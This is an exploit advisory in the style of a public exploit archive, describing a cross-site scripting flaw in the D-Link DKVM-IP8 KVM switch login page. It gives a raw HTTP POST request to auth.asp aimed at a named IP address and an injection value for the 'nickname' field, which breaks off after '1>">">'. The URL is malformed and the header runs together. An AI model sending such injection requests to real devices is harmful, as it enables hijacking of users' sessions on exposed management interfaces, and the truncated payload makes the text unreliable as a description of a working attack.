# Exploit Title: D-LINK DKVM-IP8 XSS Vulnerability# Date: 01-06-2010# Author: POPCORN# Software Link: http://www.dlink.ru/# Version: 2282_dlinkA4_p8_20071213# Tested on: Windows Sp 2# Site : http://Hacking.ge# Code :
POST http://site.com80/auth.asp HTTP/1.0
Accept:*/*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0;.NET CLR 1.1.4322)
Host:212.58.116.80
Content-Length:90
Connection: Close
Pragma: no-cache
Attack details
The POST variable nickname has been set to 1>">">
